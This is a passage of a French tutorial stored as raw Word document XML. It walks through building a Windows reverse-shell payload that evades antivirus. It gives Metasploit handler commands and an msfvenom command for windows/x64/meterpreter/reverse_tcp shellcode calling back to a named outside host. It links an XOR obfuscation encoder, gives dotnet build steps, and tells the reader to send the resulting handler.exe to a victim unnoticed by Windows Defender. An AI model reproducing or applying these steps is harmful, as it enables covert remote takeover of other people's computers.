              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>=true -r win-x64 -c Release --self-contained true -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1670">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>p:PublishTrimmed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1670">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>=true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06990DA9" w14:textId="1737DF72" w:rsidR="00A05A0E" w:rsidRDefault="00A05A0E" w:rsidP="00AB1670">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5583CE10" w14:textId="389924C7" w:rsidR="00A05A0E" w:rsidRDefault="00A05A0E" w:rsidP="00AB1670">
      <w:r w:rsidRPr="00A05A0E">
        <w:t xml:space="preserve">Vous pouvez maintenant récupérer </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">l’url des fichiers « .exe » de celle-ci pour </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recupere</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> « Handle.exe »</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A95CEBE" w14:textId="0BB67C16" w:rsidR="00A05A0E" w:rsidRDefault="00A05A0E" w:rsidP="00AB1670">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E58FC94" wp14:editId="596C7883">
            <wp:extent cx="5760720" cy="96901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FC1B" w14:textId="55A7E6EA" w:rsidR="00A05A0E" w:rsidRDefault="00A05A0E" w:rsidP="00AB1670"/>
    <w:p w14:paraId="25526F7C" w14:textId="1EBC499E" w:rsidR="00A05A0E" w:rsidRDefault="00A05A0E" w:rsidP="00AB1670">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E22E3B5" wp14:editId="7323E5E3">
            <wp:extent cx="5760720" cy="1249045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C59F" w14:textId="56C90B17" w:rsidR="00A05A0E" w:rsidRDefault="00A05A0E" w:rsidP="00A8290F">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00AB4BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. Utilisation de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AB4BD6">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AB4BD6">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1C5F08" w14:textId="16E1E116" w:rsidR="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670">
      <w:r>
        <w:t xml:space="preserve">De loin la partie la plus simple, Nous utiliserons uniquement la console de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour communiquer avec le PC infecté.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427E8633" w14:textId="7D54E8EA" w:rsidR="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670">
      <w:r>
        <w:t>Pour ce faire, en tant qu’utilisateur lambda (il est important de ne pas le lancer en tant que l’utilisateur root sinon nous serions limités avec certaines applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E7479" w14:textId="016733E2" w:rsidR="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670"/>
    <w:p w14:paraId="7EB05B59" w14:textId="629C273D" w:rsidR="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670">
      <w:r>
        <w:t>Lancer la commande :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533E899E" w14:textId="23BFF985" w:rsidR="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E3FF466" wp14:editId="43CD350D">
            <wp:extent cx="3701629" cy="41751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2932" cy="4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378C" w14:textId="4E0942A1" w:rsidR="00AB4BD6" w:rsidRDefault="00AB4BD6"/>
    <w:p w14:paraId="16D43537" w14:textId="0732DD8E" w:rsidR="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670">
      <w:r>
        <w:t xml:space="preserve">Pour configurer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> avec votre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, entrez ces command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4BD6" w:rsidRPr="00AB4BD6" w14:paraId="1AAEBE59" w14:textId="77777777" w:rsidTr="00AB4BD6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F547E63" w14:textId="6E08074C" w:rsidR="00AB4BD6" w:rsidRPr="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB4BD6">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>use multi/handler</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E0400D3" w14:textId="77777777" w:rsidR="00AB4BD6" w:rsidRPr="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="271669E0" w14:textId="77777777" w:rsidR="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB4BD6">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">set payload </w:t>
            </w:r>
            <w:r w:rsidRPr="00AB4BD6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>windows/x64/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB4BD6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB4BD6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB4BD6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="716765DB" w14:textId="77777777" w:rsidR="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23A03A23" w14:textId="77777777" w:rsidR="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>lhost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0.0.0.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28A8297C" w14:textId="77777777" w:rsidR="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0EF2FBB3" w14:textId="51C1FABD" w:rsidR="00AB4BD6" w:rsidRPr="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>lport</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AB4BD6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70EF2B49" w14:textId="544DFEBE" w:rsidR="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F329A36" w14:textId="409DD3E9" w:rsidR="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670">
      <w:r w:rsidRPr="00AB4BD6">
        <w:t>Les parties jaunes son</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">t </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4BD6">
        <w:t>en f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ait à compléter avec </w:t>
      </w:r>
      <w:r w:rsidR="00836727">
        <w:t>les paramètres entrés</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dans la commande </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exécutée en début de ce document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625EEAD1" w14:textId="280BE161" w:rsidR="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670"/>
    <w:p w14:paraId="0588C46F" w14:textId="77777777" w:rsidR="00AB4BD6" w:rsidRDefault="00AB4BD6" w:rsidP="00AB1670">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4BD6">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Lancez l’écoute de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB4BD6">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB4BD6">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD202DA" w14:textId="1F66881E" w:rsidR="00AB4BD6" w:rsidRDefault="00836727" w:rsidP="00AB1670">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4BD6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00AB4BD6" w:rsidRPr="00AB4BD6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>xploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B9F7FD" w14:textId="4F6FD12E" w:rsidR="00836727" w:rsidRDefault="00836727" w:rsidP="00AB1670">
      <w:pPr>
        <w:rPr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29DB76A6" wp14:editId="636381AA">
            <wp:extent cx="5372100" cy="16859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E57B" w14:textId="228E717B" w:rsidR="00836727" w:rsidRDefault="00836727" w:rsidP="00AB1670">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA44EC7" w14:textId="336F12FE" w:rsidR="00836727" w:rsidRDefault="00836727" w:rsidP="00AB1670">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473866ED" w14:textId="2D50D0D6" w:rsidR="00836727" w:rsidRPr="00836727" w:rsidRDefault="00836727" w:rsidP="00AB1670">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00836727">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Voila ! votre Virus/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00836727">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00836727">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> est prêt !</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10685A04" w14:textId="3EA09763" w:rsidR="00836727" w:rsidRDefault="00836727" w:rsidP="00AB1670">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00836727">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Vous pouvez envoyer le fichier handler.exe à votre cible sans risquer de se faire bloquer par </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00836727">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00836727">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> defender !</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DC7A52" w14:textId="38599C0C" w:rsidR="00836727" w:rsidRDefault="00836727" w:rsidP="00AB167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Lorsque la victime lancera le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">, l’interface vous notifiera d’une connexion entrante en un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> propre à </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> vous sera accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E2D20F" w14:textId="2DA1483E" w:rsidR="00836727" w:rsidRPr="00836727" w:rsidRDefault="00836727" w:rsidP="00836727">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5D2E3E" w14:textId="46FF757C" w:rsidR="00836727" w:rsidRPr="00836727" w:rsidRDefault="00836727" w:rsidP="0083672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14AE5FF" wp14:editId="6FF76F50">
            <wp:extent cx="5760720" cy="10134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E2D8" w14:textId="75796FE7" w:rsidR="00836727" w:rsidRPr="00836727" w:rsidRDefault="00836727" w:rsidP="00836727">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC6DF70" w14:textId="3E76A288" w:rsidR="00836727" w:rsidRPr="00836727" w:rsidRDefault="00836727" w:rsidP="00836727">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="684602E3" w14:textId="41FDDD60" w:rsidR="00836727" w:rsidRPr="00836727" w:rsidRDefault="00836727" w:rsidP="00836727">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E28671F" w14:textId="6F091C26" w:rsidR="00836727" w:rsidRPr="00836727" w:rsidRDefault="00836727" w:rsidP="00836727">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B89E2CD" w14:textId="03CEBC33" w:rsidR="00836727" w:rsidRPr="00836727" w:rsidRDefault="00836727" w:rsidP="00836727">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D16AF52" w14:textId="50CD217A" w:rsidR="00836727" w:rsidRPr="00836727" w:rsidRDefault="00836727" w:rsidP="00836727"/>
    <w:p w14:paraId="60F78426" w14:textId="2138A350" w:rsidR="00836727" w:rsidRDefault="00836727" w:rsidP="00836727">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Voila</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> l’analyse de Windows defender :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DE024A" w14:textId="754C852D" w:rsidR="00836727" w:rsidRDefault="00836727" w:rsidP="00836727">
      <w:r w:rsidRPr="00836727">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="044AD4C7" wp14:editId="45D18486">
            <wp:extent cx="4152900" cy="27241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045" w14:textId="67E16CBD" w:rsidR="00836727" w:rsidRDefault="00836727" w:rsidP="00836727"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="10567" w:type="dxa"/>
        <w:tblInd w:w="-719" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10567"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CC6D6B" w14:paraId="5695F086" w14:textId="77777777" w:rsidTr="00A8290F">
        <w:trPr>
          <w:trHeight w:val="4434"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E5991B6" w14:textId="050E076B" w:rsidR="00CC6D6B" w:rsidRDefault="00CC6D6B" w:rsidP="00CC6D6B">
            <w:r>
              <w:t>Commandes utilisées</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D380155" w14:textId="77777777" w:rsidR="00CC6D6B" w:rsidRDefault="00CC6D6B" w:rsidP="00CC6D6B">
            <w:r>
              <w:t xml:space="preserve">Pour générer un </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Metasploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> sous la forme d'un </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shellcode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> avec </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>msfvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7897EA6C" w14:textId="77777777" w:rsidR="00CC6D6B" w:rsidRPr="00CC6D6B" w:rsidRDefault="00CC6D6B" w:rsidP="00CC6D6B">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CC6D6B">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>msfvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CC6D6B">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> -p windows/x64/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CC6D6B">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CC6D6B">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CC6D6B">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CC6D6B">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> LHOST=peertube.lestutosdeprocessus.fr LPORT=8080 EXITFUNC=thread -f </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CC6D6B">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>csharp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="77093B8D" w14:textId="77777777" w:rsidR="00CC6D6B" w:rsidRPr="00CC6D6B" w:rsidRDefault="00CC6D6B" w:rsidP="00CC6D6B">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="383E760D" w14:textId="77777777" w:rsidR="00CC6D6B" w:rsidRDefault="00CC6D6B" w:rsidP="00CC6D6B">
            <w:r>
              <w:t xml:space="preserve">Le script </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>XorCoder</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> pour obfusquer son </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>payload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> avec une fonction XOR :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F43A4DE" w14:textId="77777777" w:rsidR="00CC6D6B" w:rsidRDefault="00CC6D6B" w:rsidP="00CC6D6B">
            <w:r>
              <w:t>https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/XOR%20Shellcode%20Encoder/Program.cs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7118B1CF" w14:textId="77777777" w:rsidR="00CC6D6B" w:rsidRDefault="00CC6D6B" w:rsidP="00CC6D6B"/>
          <w:p w14:paraId="5B6A583F" w14:textId="77777777" w:rsidR="00CC6D6B" w:rsidRDefault="00CC6D6B" w:rsidP="00CC6D6B">
            <w:r>
              <w:t xml:space="preserve">Pour créer un nouveau projet </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DotNet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> en mode console dans Visual Studio Code :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19C84114" w14:textId="77777777" w:rsidR="00CC6D6B" w:rsidRDefault="00CC6D6B" w:rsidP="00CC6D6B">
            <w:r>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dotnet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> new console"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32756E17" w14:textId="77777777" w:rsidR="00CC6D6B" w:rsidRDefault="00CC6D6B" w:rsidP="00CC6D6B">
            <w:r>
              <w:t xml:space="preserve">Pour compiler le projet </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DotNet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> sous la forme d'un seul fichier exécutable intégrant ses librairies :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E0D2951" w14:textId="77777777" w:rsidR="00CC6D6B" w:rsidRPr="00CC6D6B" w:rsidRDefault="00CC6D6B" w:rsidP="00CC6D6B">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC6D6B">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>"dotnet publish -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CC6D6B">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>p:PublishSingleFile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CC6D6B">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>=true -r win-x64 -c Release --self-contained true -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CC6D6B">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>p:PublishTrimmed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CC6D6B">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
